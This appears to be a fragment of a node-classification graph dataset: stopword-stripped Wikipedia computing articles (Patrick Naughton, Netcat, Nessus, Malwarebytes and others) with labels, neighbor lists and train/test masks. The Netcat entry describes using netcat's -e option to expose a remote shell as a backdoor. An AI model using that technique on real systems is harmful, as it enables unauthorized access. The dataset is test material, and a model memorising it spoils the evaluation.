    "text": "Patrick_Naughton:patrick naughton patrick naughton american software developer one creators java programming language 1983 naughton co-wrote macpaint clone painter apprentice russ nelson sun microsystems engineer patrick naughton become frustrated state sun c++ c apis application programming interfaces tools considering moving next naughton offered chance work new technology thus stealth project started stealth project soon renamed green project james gosling mike sheridan joining naughton together engineers began work small office sand hill road menlo park california attempting develop new technology programming next generation smart appliances sun expected major new opportunity june july 1994 three days brainstorming john gage director science sun james gosling bill joy naughton wayne rosing eric schmidt team re-targeted platform world wide web felt advent first graphical web browser mosaic internet way evolving highly interactive medium envisioned cable tv prototype naughton wrote small browser webrunner later renamed hotjava 1994 naughton quit sun starwave property paul allen develop server java applications web sites author java handbook osborne 1995 co-author java complete reference herbert schildt osborne 1996 1998 walt disney internet group acquired starwave amalgamated infoseek go network company result naughton became executive vice president infoseek arrest 1999 naughton fired infoseek sept. 14 1999 naughton flew seattle los angeles private disney jet expecting five-foot blonde haired 13-year-old girl wait pier near roller coaster carrying green backpack instructed naughton naughton written love sex wanted get alone hotel room nowiki /nowiki nowiki /nowiki strip naked naughton arranged meeting posing hot seattle online predator handle online chat room called dad daughtersex girl actually fbi agent two days later arrested fbi charged traveling interstate commerce intent sex minor violation 18 u.s.c §2423 b trial ended hung jury naughton struck plea agreement took reduced sentence admitted traveled seattle los angeles last september dominant purpose engage sexual acts krisla online chat buddy believed 13-year-old girl ended serving prison time exchange working fbi free year line defense claimed persuaded participate online ritualized sexual role-playing exercise dealing mature woman acting girl then-novel defense became known fantasy defense pedophiles",
    "neighbors": [
      3712,
      7176,
      910,
      10526,
      1316,
      5031,
      5677,
      6067,
      9011,
      6074,
      10683,
      572,
      7485,
      10684,
      5567,
      3519,
      9665,
      7750,
      6860,
      3920,
      10193,
      1363,
      4960,
      1250,
      2658,
      5987,
      3560,
      3561,
      3562,
      7146,
      7806,
      5872,
      8825,
      9078,
      119,
      3705,
      2045,
      3966,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 4359,
    "label": 5,
    "text": "Sinec_H1:sinec h1 sinec h1 industrial ethernet communications protocol provides transport layer function widely used automation process control applications protocol developed siemens used mainly control applications large bandwidth well suited transmission large volumes data used part control infrastructure cern lhc",
    "neighbors": [
      2030,
      11267,
      2117,
      62
    ],
    "mask": "Test"
  },
  {
    "node_id": 4360,
    "label": 2,
    "text": "Criticism_of_Linux:criticism linux criticism linux focuses issues concerning use operating systems use linux kernel linux-based android operating system dominates smartphone market many countries linux used new york stock exchange supercomputers used desktop laptop computers much criticism linux related lack desktop laptop adoption although 2015 growing unease project perspective security adoption systemd controversial security professionals say rise prominence operating system-level virtualization using linux raised profile attacks kernel linus torvalds reticent add mitigations kernel-level attacks official releases linux 4.12 released 2017 enabled kaslr default effectiveness debated con kolivas former kernel developer tried optimize kernel scheduler interactive desktop use finally dropped support patches due lack appreciation development 2007 interview quit kernel developer con kolivas stated linuxcon 2009 linux creator linus torvalds said linux kernel become bloated huge linuxcon 2014 linux creator linus torvalds said thinks bloat situation better modern pcs lot faster interview german newspaper zeit online november 2011 linus torvalds stated linux become complex concerned developers would able find way software anymore complained even subsystems become complex told publication afraid day error evaluated anymore andrew morton one linux kernel lead developers explains many bugs identified linux never fixed theo de raadt founder openbsd compares openbsd development process linux critics linux desktop frequently argued lack top-selling video games platform holds adoption back september 2015 steam gaming service 1,500 games available linux compared 2,323 games mac 6,500 windows games desktop operating system linux criticized number fronts including another common complaint levelled linux abundance distributions available august 2014 distrowatch lists 285 major distributions linux advocates defended number example freedom choice critics cite large number cause confusion lack standardization linux operating systems alexander wolfe wrote informationweek caitlyn martin linuxdevcenter critical number linux distributions recent decades since established dominance microsoft windows hardware developers often reluctant provide full technical documentation products allow drivers written meant linux user carefully hand pick hardware made system ensure functionality compatibility problems largely addressed one time linux systems required removable media floppy discs cd-roms manually mounted could accessed mounting media automatic nearly distributions development udev companies emperorlinux addressed problems laptop hardware compatibility mating modified linux distributions specially selected hardware ensure compatibility delivery traditional directory structure heritage linux unix roots 1970s criticized inappropriate desktop end users linux distributions like gobolinux moonos proposed alternative hierarchies argued easier end users though achieved little acceptance 2004 microsoft initiated get facts marketing campaign specifically criticized linux server usage particular claimed vulnerabilities windows fewer number linux distributions windows reliable secure linux total cost ownership linux higher due complexity acquisition costs support costs use linux places burden liability businesses linux vendors provide little indemnification coverage addition corporation published various studies attempt prove – factuality heavily disputed different authors claim microsoft comparisons flawed many linux distributors offer indemnification customers internal microsoft reports halloween documents leak presented conflicting views particularly documents 1998 1999 ceded linux ... trusted mission critical applications – due open source code – long term credibility exceeds many competitive oss advanced win32 gui user would short learning cycle become productive linux long term simple experiments indicate linux chance desktop market ... overall respondents felt compelling reason support oss 'offers low total cost ownership tco linux community mixed responses criticisms mentioned criticism led new features better user-friendliness linux community whole reputation resistant criticism writing pc world keir thomas noted time world linux tends anti-critical anybody community dares critical get stomped upon 2015 interview linus torvalds also mentioned tendency linux desktop environment projects blame users instead case criticism",
    "neighbors": [
      2560,
      4616,
      3082,
      5644,
      5139,
      9237,
      10780,
      4637,
      10785,
      3618,
      6180,
      9257,
      1584,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      2134,
      6743,
      3162,
      1632,
      2658,
      10338,
      6244,
      5222,
      10856,
      6763,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      657,
      2195,
      2711,
      6808,
      9882,
      10394,
      6301,
      1694,
      2723,
      8364,
      10933,
      5822,
      5824,
      4803,
      1736,
      2762,
      6352,
      3289,
      3802,
      4831,
      8928,
      1761,
      10464,
      2278,
      233,
      4841,
      7403,
      7920,
      10482,
      8439,
      2809,
      7938,
      1291,
      4367,
      1813,
      792,
      5410,
      295,
      1833,
      815,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      6988,
      10063,
      4437,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      10658,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      8621,
      9646,
      1456,
      1972,
      9660,
      10687,
      9667,
      1480,
      457,
      4040,
      5067,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 4361,
    "label": 3,
    "text": "Juno_First:juno first juno first ported commodore 64 atari 8-bit family greg hiscott published datasoft 1983 1984 respectively juno first presents set number enemies per level make gallery formation like galaga space invaders instead player ship move forward backward addition left right hunt enemies orientation vertical horizon-oriented tilt style gameplay would re-used later konami shooter axelay player destroys waves enemies finish levels starting formations vary stage stage addition player pick humanoid upon screen red tint happens every enemy player shoots earn player 200 points previous enemy destroyed original score shooting enemy humanoid mode depends stage unofficial hobbyist port—with name original—was made available atari 2600",
    "neighbors": [
      11522,
      3075,
      9006,
      1776,
      4759
    ],
    "mask": "Train"
  },
  {
    "node_id": 4362,
    "label": 8,
    "text": "Load_Shedding:load shedding load shedding technique used information systems especially web services avoid overloading system making unavailable users idea ignore requests rather crashing system making fail serve request considerations shaping design load shedding algorithms include popular open-source tool defending delays downstream systems finagle",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4363,
    "label": 7,
    "text": "SAP_Business_ByDesign:sap business bydesign sap business bydesign byd cloud enterprise resource planning software cloud erp sold operated software service sap se designed small 20 mio revenue medium-sized enterprises =350 mio revenue software designed provide business processes across application areas financials human resources embedded business analytics mobility e-learning support sap business bydesign built principles service oriented architecture soa integration business capabilities accomplished via messages underlying technology stack multi-tenancy enabled sap netweaver stack leveraging sap in-memory hana database bydesign deployed 144 countries supports 12 languages including simplified chinese japanese korean polish hebrew sap delivers 39 countries either fully localized pre-localized 118 countries sap offers basic tax content addition customers partners create custom country versions using localization toolkit provided sap examples 72 localizations customers partners taiwan malaysia vietnam chile peru sap business bydesign processes grouped application areas interlinked so-called business scenarios scenarios provide business processes span across companies partners departments employees main application areas core business scenarios sap announced sap business bydesign 19 september 2007 event new york previously known code name a1s since initial general available release 2007 so-called feature pack 1.2 enhanced quarterly releases",
    "neighbors": [
      4194,
      467,
      4197,
      5210
    ],
    "mask": "None"
  },
  {
    "node_id": 4364,
    "label": 2,
    "text": "Nintendo_DSi_system_software:nintendo dsi system software nintendo dsi system software set updatable firmware versions software frontend nintendo dsi including xl variant video game console updates downloaded via system internet connection allow nintendo add remove features software updates also include changes previous updates user interface nintendo dsi redesigned nintendo ds nintendo ds lite dsi user interface slideable single row icons moving programs fairly snappy icons big enough new touchscreen allow navigation using fingers instead built-in stylus users load dsi first time system snaps shot faces faces fill entire top screen whenever main menu main menu take picture time pressing shoulder buttons camera used also selected within programs power button doubles home button bringing back main screen soft reset nintendo dsi provides built-in applications initially users able access following programs main menu dsi camera dsi sound dsi shop pictochat download play dsi menu akin channel interface nintendo wii new programs downloaded added interface dsi camera application snap shots sorts zany real-time filters users put photos squish heads however subject low resolution actual cameras 0.3mp additionally program recognize shots users taken digital cameras editing dsi sound application thematically similar dsi camera serving sound recorder editor along low bitrate aac music player notable features like excitebike starfox-themed equalizers modulators make user voice sound like robot parakeet dsi shop would serve ds version wii shop channel unlike nintendo previous handheld consoles nintendo ds nintendo ds lite nintendo dsi built music playback support dsi music program split two modes voice recording music playback offer plenty entertainment value tools gimmicks nintendo included recording mode lets users record 18 clips maximum 10 seconds length recorded clip play around various ways example users make clip play backwards forwards isolate small sections using a-b repeat modify speed tone dragging pointer around 2d graph also apply 12 effects clip used transform sound music playback mode also many play options song loaded users change speed tone like recording mode also overlay recordings made recording mode songs point addition nintendo provided set sound effects selected quickly using stylus inserted freely using shoulder buttons unlike built-in dsi camera application would read files generated dsi dsi music application restriction comes files directory structure files stored multi-level directory structure root directory sd card dsi parsed instantly displayed internal directories quick access playback users access features forwarding rewinding volume controls nintendo presumably envisioned dsi music substitute real music player however important drawback ds music application support popular mp3 format instead player supports aac format .mp4 .m4a .3gp filename extensions furthermore compared sony playstation portable difficult interface dsi pc usb port system order transfer music podcasts users need remove sd card plug directly pc one major updates nintendo dsi brings nintendo ds line full network connectivity unlike original nintendo ds nintendo ds lite featured minimal network connectivity download content firmware updates core dsi experience similar wii sony playstation portable consoles example users first power system click dsi shop icon main menu immediately prompted run firmware update nintendo dsi supports wep wpa aes/tkip wpa2 aes/tkip wireless encryption software built-in support use latter two encryption types supported ds ds lite dsi shop application users purchase various dsiware titles cute music blocky interface somewhat similar counterpart wii users permanently login club nintendo account track purchase rewards main shopping interface also lets users add dsi points read dsi shop manual firmware updates dsi shopping experience quite similar wii although big problem dsi shopping slow speed furthermore like previous nintendo ds ds lite nintendo dsi includes web browser version opera browser support html5 canvas object css opacity however limitations features web surfing either platforms whole good experience addition slow download speeds browser difficulty rendering pages example many pages would load completely compatible movie files music files adobe flash multimedia content sites like youtube nintendo dsi collection games applications specifically designed nintendo dsi handheld game console available download via dsi shop known dsiware since games applications specifically targeted nintendo dsi compatible original nintendo ds nintendo ds lite consoles nintendo dsi nintendo first region-locked handheld prevents using certain software released another region unlike original nintendo ds models member nintendo ds line nintendo dsi backward compatible original nintendo ds games cartridge software compatible previous models including original ds games internet browsing photo sharing region-locked later successor nintendo 3ds consoles also adopted approach result nintendo dsi 3ds-specific games locked certain region original ds games still region-free addition dsiware dsi-exclusive although later also run 3ds also dsi-enhanced games containing dsi-exclusive features still played earlier nintendo ds models original ds games run dsi dsi backward compatible game boy advance gba games original ds games require gba slot since dsi lacks slot unlike ds ds lite absence dsi also backward compatible accessories requiring gba slot nintendo ds rumble pak homebrew flash cards designed previous ds models incompatible dsi new cards capable running ds software even dsiware dsi available users transfer purchased dsiware nintendo dsi consoles units dsiware transferred nintendo 3ds although saved data like nintendo dsi nintendo 3ds backward compatible nintendo ds nintendo dsi software list major system updates nintendo dsi gaming platforms nintendo gaming platforms next generation gaming platforms generation",
    "neighbors": [
      6276,
      9477,
      11271,
      8584,
      10761,
      3089,
      10393,
      6301,
      5406,
      4383,
      673,
      3626,
      1067,
      684,
      4908,
      7727,
      7857,
      7991,
      9784,
      1083,
      5824,
      7492,
      11079,
      9033,
      2001,
      2259,
      7253,
      6486,
      10329,
      3162,
      10332,
      607,
      10080,
      2658,
      10215,
      3561,
      6763,
      6508,
      2925,
      495,
      8316,
      1524,
      5369,
      1148,
      8829,
      11391
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4365,
    "label": 2,
    "text": "Nokia_PC_Suite:nokia pc suite nokia pc suite software package used establish interface nokia mobile devices computers run microsoft windows operating system first release 1997 originally called nokia data suite replaced nokia suite integrated ovi service suite nokia pc suite used transfer music photos applications also used send short message service sms messages act modem connect computer internet mobile phone connected usb bluetooth infrared older nokia phones lack compatibility later versions pc suite official site supplies table matches phone model recent compatible version latest version nokia pc suite also contains several integrated applications including file manager application installer nokia communication centre data viewer pc suite users also access on-device features e.g battery memory call handling well nokia pc sync functionality earliest devices worked nokia data suite nokia 3110 nokia 6110 nokia 8110 nokia pc suite unimproved replaced nokia next generation phone suite software nokia suite supported platforms addition windows nokia suite drops lotus notes client sync support present nokia pc suite instead requiring user use lotus notes traveler software must installed maintained lotus notes server synchronization using pc suite works phone user pc synchronization phone nokia suite must use third party software backup feature pc suite uses non-documented binary file format .nbu used restore phone proprietary client means data accessed restore working phone third-party programs either commercial free used read file greatly vary amount information retrieve nokia pc sync allows user synchronize contacts calendar notes to-do items e-mails bookmarks files/folders supported nokia mobile phone pc sync 7.0.9.2 contained major bug truncating street addresses edited pc run one line synchronized back phone possible lose large parts contacts address information due issue nokia pc suite unable add update maps voices nokia maps application requires nokia map loader nokia suite require microsoft windows .net framework installed however possible download maps nokia maps without need nokia map loader nokia suite pointing web browser directly map files nokia maps server",
    "neighbors": [
      737,
      7399,
      6505,
      6797,
      9262,
      7983,
      2449,
      1972,
      5211,
      2684,
      6748
    ],
    "mask": "Test"
  },
  {
    "node_id": 4366,
    "label": 4,
    "text": "BitArmor:bitarmor bitarmor systems inc. firm based gateway center downtown pittsburgh pennsylvania founded 2003 two carnegie mellon university alumni bitarmor sold software-based encryption data management technologies company mainly focused industries required protection sensitive data retail education health care bitarmor primary product bitarmor datacontrol software solution combined full disk encryption persistent file encryption technology company completed 5 million round venture capital funding may 2009 bitarmor used venture capital fund development efforts expand marketing sales time round financing bitarmor employed 35 people bitarmor acquired trustwave january 2010 order strengthen latter pci services",
    "neighbors": [
      7794,
      6309,
      3382
    ],
    "mask": "Test"
  },
  {
    "node_id": 4367,
    "label": 2,
    "text": "Matthew_Garrett:matthew garrett matthew garrett technologist programmer free software activist major contributor series free software projects including linux gnome debian ubuntu red hat recipient free software award free software foundation work secure boot uefi linux kernel garrett states born galway ireland phd genetics university cambridge author several articles drosophila melanogaster i.e. fruit fly genetics garrett contributor gnome debian linux projects early contributor ubuntu initial member ubuntu technical board worked contractor canonical ltd. worked red hat canonical ltd. red hat garrett worked power management linux red hat garrett also worked issues relating secure boot uefi linux kernel preserve users ability run operating system choosing hardware supporting secure boot work eventually led awarded 2013 fsf free software award garrett worked cloud computing platform company coreos cited press expert cloud computing issues since 28 january 2017 working google recipient free software award free software foundation work secure boot uefi linux kernel garrett strong advocate software freedom compliance gnu general public license gpl linux kernel example garrett filed complaint us customs fusion garage due violations gpl october 2014 garrett stated blog would longer contribute linux kernel changes relating intel hardware response intel pulling ads gamasutra gamergate controversy however intel took steps demonstrate commitment diversity way appreciated edited post reflect happy resume working",
    "neighbors": [
      1026,
      516,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      6691,
      6180,
      8240,
      8242,
      9266,
      5689,
      11322,
      2109,
      6213,
      10822,
      8263,
      8268,
      589,
      4177,
      8787,
      4194,
      5222,
      10856,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      1694,
      6302,
      8354,
      2723,
      8364,
      1717,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      6352,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      10464,
      2278,
      233,
      9455,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      7450,
      10016,
      802,
      6947,
      5410,
      295,
      5931,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      7540,
      11643,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      10687,
      457,
      9696,
      2529,
      6625,
      11232,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 4368,
    "label": 2,
    "text": "CFQ:cfq completely fair queuing cfq i/o scheduler linux kernel written 2003 jens axboe cfq places synchronous requests submitted processes number per-process queues allocates timeslices queues access disk length time slice number requests queue allowed submit depends i/o priority given process asynchronous requests processes batched together fewer queues one per priority cfq explicit anticipatory i/o scheduling achieves effect good aggregate throughput system whole allowing process queue idle end synchronous i/o thereby anticipating close i/o process considered natural extension granting i/o time slices process february 2003 andrea arcangeli put forward idea stochastic fair queueing i/o scheduler jens axboe implemented jens axboe made improvements first implementation calling new version completely fair queueing scheduler produced patch apply 2.5.60 development series kernel cfq i/o scheduler first integrated mainline kernel optional i/o scheduler possible change scheduler boot time 'elevator parameter kernel red hat enterprise linux 4 used i/o scheduler default even though used kernel based 2.6.9 second release cfq scheduler dubbed cfqv2 included 2.6.10 improvements include better responsiveness elimination starvation issues present earlier version scheduler also switchable run time modifying /sys/block/ block_device /queue/scheduler variable sysfs filesystem cfq scheduler moved new time sliced design dubbed cfqv3 among things implements ioprio_get 2 ioprio_set 2 allows user set per-process i/o priorities usually using ionice 1 command although using nice 1 also modifies i/o priorities somewhat cfq became default scheduler replacing anticipatory scheduler",
    "neighbors": [
      6438,
      318,
      4423
    ],
    "mask": "None"
  },
  {
    "node_id": 4369,
    "label": 4,
    "text": "Netcat:netcat netcat often abbreviated nc computer networking utility reading writing network connections using tcp udp command designed dependable back-end used directly easily driven programs scripts time feature-rich network debugging investigation tool since produce almost kind connection user could need number built-in capabilities list features includes port scanning transferring files port listening used backdoor original netcat features include rewrites like gnu openbsd support additional features example openbsd nc supports tls nc mail.server.net 25 full response including http headers dumped standard output file accessed via web browser nowiki http //servername:8080/ /nowiki netcat serves file first client connects exits also provides content length browsers expect work fine lan may potentially fail kind firewall between. versions netcat like netcat-traditional debian 8.6 need specify -p port number nc -vzu 192.168.0.1 nowiki 80-90 /nowiki note udp tests always show open test useful shell access server tested know whether firewall blocking specific udp port server listening host i.e server whose port needs checked following sending host following – note codice_1 hostname listening host text typed sending host type something hit enter displayed also listening host udp port 4172 open open get error connection refused caveat machines ipv6 may default ip version use codice_2 thus host specified hostname contacted using ipv6 user might know ports may appear closed test even though would open using ipv4 difficult notice may cause false impression port blocked actually open force use ipv4 using adding codice_3 options codice_4 commands echo 0 message nc -w 1 -u loggerhost 514 uncommon use codice_2 port scanning netcat considered best tool job sufficient advanced tool nmap codice_6 parameter prevents dns lookup codice_7 makes codice_4 receive data server codice_9 makes connection timeout 1 second inactivity another useful behaviour using codice_2 proxy ports hosts redirected look example port 12345 represents request starts codice_4 server port 12345 connections get redirected codice_12 web browser makes request codice_4 request sent google response sent web browser pipes unidirectional worked around named pipe redirect input output codice_14 option may also used codice_15 implementation using named pipe reliable method using codice_14 option provides one-shot proxy another useful feature proxy ssl connections way traffic viewed wire sniffing applications wireshark accomplished unixes utilizing codice_17 codice_2 codice_19 codice_2 used make process network server listen port pipe input receives process codice_21 option spawns executable input output redirected via network socket example possible expose bourne shell process remote computers computer ip address 192.168.1.2 run command computer network one could run codice_4 command way codice_21 option used create rudimentary backdoor administrators perceive risk thus allow codice_2 computer ncat similar tool netcat provided nmap suite ncat n't built code “ traditional ” netcat implementation ncat definitely based netcat spirit functionality codice_29 user host1 ncat -l 9899 outputfile user host2 ncat host1 9899 inputfile user host1 ncat -l 9899 inputfile user host2 ncat host1 9899 outputfile suppose ssh tunnel want copy file remote machine could codice_32 directly opens another connection goal re-use existing connection use netcat ssh add codice_33 port forwarding sending everything port 31000 remote machine port local machine extra overhead tcp takes care error correction ssh already encrypted pipe original version netcat unix program last version 1.10 released march 1996 several implementations posix systems including rewrites scratch like gnu netcat openbsd netcat latter supports ipv6 tls openbsd version ported freebsd base windows/cygwin mac os x comes netcat installed osx 10.13 users use macports install variant dos version netcat called ntool included freedos package group networking based wattcp stack licensed european union public licence version 1.1 known ports embedded systems includes versions windows ce named netcat 4 wince iphone busybox includes default lightweight version netcat solaris 11 includes netcat implementation based openbsd netcat socat complex variant netcat larger flexible options must configured given task february 1 2016 santiago zanella-beguelin microsoft vulnerability research issued security advisory regarding composite diffie-hellman parameter hard-coded openssl implementation socat implausibility composite might unintentionally introduced prime number required led suspicion sabotage introduce backdoor software vulnerability socat bug affected version 1.7.3.0 2.0.0-b8 corrected following releases 1.7.3.1 2.0.0-b9 cryptcat version netcat integrated transport encryption capabilities middle 2005 nmap announced another netcat incarnation called ncat features new possibilities connection brokering tcp/udp redirection socks4 client server support ability chain ncat processes http connect proxying proxy chaining ssl connect/listen support ip address/connection filtering like nmap ncat cross-platform systems modified versions similar netcat utilities go command name codice_4 codice_15 codice_38 codice_39 codice_40 codice_41 codice_42",
    "neighbors": [
      9217,
      515,
      516,
      9732,
      9733,
      9735,
      3976,
      9868,
      6797,
      4750,
      9487,
      5397,
      2198,
      11413,
      6812,
      292,
      7847,
      10924,
      4398,
      7983,
      2739,
      8499,
      823,
      1336,
      7356,
      321,
      965,
      842,
      3659,
      8522,
      3539,
      9946,
      5468,
      5469,
      5470,
      6877,
      8414,
      6498,
      6120,
      9320,
      11112,
      107,
      5612,
      4850,
      5492,
      9204,
      6138,
      11006,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 4370,
    "label": 5,
    "text": "Structured_Stream_Transport:structured stream transport computer networking structured stream transport sst experimental transport protocol provides ordered reliable byte stream abstraction similar tcp enhances optimizes stream management permit applications use streams much fine-grained fashion feasible tcp streams",
    "neighbors": [
      10924,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 4371,
    "label": 4,
    "text": "Spanish_Cybersecurity_Research_Conference:spanish cybersecurity research conference spanish cybersecurity research conference spanish jornadas nacionales de investigación en ciberseguridad jnic scientific congress works meeting point different actors working field cybersecurity research universities technological research centres companies public authorities exchange knowledge experience shared goal strengthening research cybersecurity field national level need run kind conferences identified drafting summary report feasibility study design network centers excellence r cybersecurity consensus participants strategic plan spanish network excellence cybersecurity research included measure 17 creation national cybsersecurity r d+i conferences intended scientific meeting point network excellence particular research ecosystem general could demonstrate capacities terms knowledge talent terms research findings potential transference market equally measure 12 study proposed design open call proposals mechanisms evaluate select candidates order grant awards acknowledgement research excellence edition conferences organised institution selected according procedure laid regulation jnic organising committee named based regulations established jnic general chair committee representative organising institution responsible event spanish national cybersecurity institute incibe mission support research cybersecurity strengthening cybersecurity sector participates organization conference aim converting jnic scientific forum excellence national cybersecurity field promotes innovation first time 2017 edition complete technological transfer program designed instrument bring final users companies organisms etc contact researchers order solve cybersecurity problems currently unresolved formulated scientific challenges good reception success participation new initiative challengers research teams expected program continue grow transfer track part jnic future editions",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4372,
    "label": 7,
    "text": "IQNavigator:iqnavigator iqnavigator provides services procurement solutions vendor management system vms managed services offerings 2010 iqnavigator recognized leading services procurement software vendor forrester research inc. forrester wave™ services procurement q3 2010 september 2010 forrester indicated iqnavigator provides all-around excellent solution privately funded iqnavigator inc founded april 1999 focuses helping companies achieve competitive advantage talent management company headquarters denver colorado london england along satellite locations throughout europe asia iqnavigator vendor management system saas platform accessed 100 countries daily iqnavigator clients manage billions spend contingent labor outside services iqnavigator offers ability create custom report fields including customer defined fields reports either run real-time scheduled run predefined bases weekly monthly etc. iqnavigator offers variety mobile computing features including time entry approvals sourcing real-time access statistics interactive reports data views features available blackberry iphone ipad android devices",
    "neighbors": [
      4194,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 4373,
    "label": 4,
    "text": "Nessus_(software):nessus software nessus proprietary vulnerability scanner developed tenable inc. nasdaq tenb examples vulnerabilities exposures nessus scan include nessus scans cover wide range technologies including operating systems network devices hypervisors databases web servers critical infrastructure results scan reported various formats plain text xml html latex results also saved knowledge base debugging unix scanning automated use command-line client exist many different commercial free open source tools unix windows manage individual distributed nessus scanners nessus provides additional functionality beyond testing known network vulnerabilities instance use windows credentials examine patch levels computers running windows operating system nessus also support configuration compliance audits scada audits pci compliance nessus project started renaud deraison 1998 provide internet community free remote security scanner october 5 2005 tenable network security company renaud deraison co-founded changed nessus 3 proprietary closed source license nessus 2 engine minority plugins still gpl leading forked open source projects based nessus like openvas porz-wahn today product still exists two formats limited free version full-feature paid subscription option nessus available linux windows mac os x. tenable inc. went public july 26 2018 twenty years nessus ’ creation",
    "neighbors": [
      7557,
      11,
      6797,
      6548,
      1429,
      3486,
      2084,
      4654,
      3503,
      7983,
      2739,
      5045,
      7989,
      7228,
      842,
      1232,
      6993,
      1491,
      8791,
      479,
      2409,
      5612
    ],
    "mask": "Test"
  },
  {
    "node_id": 4374,
    "label": 4,
    "text": "Malwarebytes_(software):malwarebytes software malwarebytes formerly malwarebytes anti-malware abbreviated mbam anti-malware software microsoft windows macos android ios finds removes malware made malwarebytes corporation first released january 2006 available free version scans removes malware started manually paid version additionally provides scheduled scans real-time protection flash-memory scanner malwarebytes formerly known malwarebytes anti-malware primarily scanner scans removes malicious software including rogue security software adware spyware malwarebytes scans batch mode rather scanning files opened reducing interference another on-demand anti-malware software also running computer malwarebytes available free premium paid version free version run manually user desired whereas paid version perform scheduled scans automatically scan files opened block ip addresses malicious web sites scan services programs device drivers currently use december 8 2016 malwarebytes inc. released version 3.0 general public includes protection malware ransomware exploit malicious websites november 2 2009 malwarebytes accused rival iobit incorporating database malwarebytes anti-malware several products vendors named security software iobit security 360 iobit denied accusation stated database based user submissions sometimes signature names malwarebytes get placed results said time filter signature names similar malwarebytes iobit also stated malwarebytes convincing proof promised databases stolen declaration iobit malwarebytes replied convinced argument iobit malwarebytes claims served dmca infringement notices cnet download.com majorgeeks order download sites remove iobit software iobit said version 1.3 database updated address accusations intellectual property theft made earlier malwarebytes vonteera adware uses stolen certificates disables anti-malware virus protection malwarebytes malwarebytes listed solution eliminating threat february 2 2016 project zero announced four vulnerabilities malwarebytes flagship product including lack server-side encryption update files lack proper payload signing within encrypted data combination allowed attacker recompile encrypted payload exploits malwarebytes responded one day disclosure blog article detailing extreme difficulty executing attacks well revealing announced server-side encryption issues resolved within days private disclosure outstanding time project zero published research malwarebytes also published information protect current users patch released event also resulted establishment formal bug bounty program malwarebytes offers 1000 per disclosure depending severity exploitability",
    "neighbors": [
      2049,
      3595,
      1052,
      550,
      2601,
      6699,
      8754,
      9791,
      10308,
      4165,
      2654,
      106,
      10872,
      127,
      7809,
      131,
      6797,
      10392,
      156,
      2721,
      2213,
      6823,
      3243,
      6834,
      704,
      7362,
      711,
      202,
      1242,
      5356,
      9964,
      6382,
      3320,
      9983,
      5891,
      5380,
      8978,
      6431,
      5924,
      1318,
      2859,
      7983,
      4403,
      9523,
      9537,
      4421,
      6474,
      1355,
      10574,
      8024,
      2907,
      7515,
      9055,
      9569,
      3941,
      11622,
      877,
      4464,
      3955,
      1417,
      9610,
      3981,
      10637,
      3473,
      8614,
      8615,
      1970,
      10166,
      7098,
      7103,
      5069,
      10708,
      2005,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "Test"
  },
  {
    "node_id": 4375,
    "label": 3,
    "text": "Lords_of_Time:lords time lords time interactive fiction computer game designed sue gazzard released level 9 computing 1983 originally purely textual adventure 8 bit microcomputers game later released part time magik compilation graphics added floppy disk versions like level 9 adventures time written in-house a-code language platform-independent – implementation virtual machine allowed quick porting across platforms anonymous hero game controlled player appears computer programmer contemporary times start game hero contacted father time sends hero quest recover nine treasures order defeat machinations evil time lords game divided 9 eras time including starting section hero living room 20th century ice age age dinosaurs dark ages future middle ages tudor england roman empire due meddling time lords anachronisms abound example cavemen found living era dinosaurs access nine different eras via grandfather clock turns time machine disguise game re-released 1988 part time magik compilation alongside red moon price magik although positioned within compilation first part trilogy real connection latter two opposed sister compilation release silicon dreams three games form trilogy reception lords time positive crash reviewing spectrum version declared find impossible justly describe brilliant adventure lords time really computer video games magazine multiformat review claimed ..the game light-hearted one fun play difficult progress suspect take rather long time complete could ask personal computer games rated pcg hit",
    "neighbors": [
      9006,
      10931,
      9166,
      8646
    ],
    "mask": "Test"
  },
  {
    "node_id": 4376,
    "label": 1,
    "text": "Database_theory:database theory database theory encapsulates broad range topics related study research theoretical realm databases database management systems theoretical aspects data management include among areas foundations query languages computational complexity expressive power queries finite model theory database design theory dependency theory foundations concurrency control database recovery deductive databases temporal spatial databases real time databases managing uncertain data probabilistic databases web data research work traditionally based relational model since model usually considered simplest foundational model interest corresponding results data models object-oriented semi-structured models recently graph data models xml often derivable relational model central focus database theory understanding complexity power query languages connection logic starting relational algebra first-order logic equivalent codd theorem insight important queries graph reachability expressible language powerful language based logic programming fixpoint logic datalog studied another focus foundations query optimization data integration work studied conjunctive queries admit query optimization even constraints using chase algorithm main research conferences area acm symposium principles database systems pods international conference database theory icdt",
    "neighbors": [
      2688,
      9481,
      10505,
      1292,
      10258,
      7446,
      10518,
      9112,
      7968,
      1697,
      290,
      1314,
      7461,
      8742,
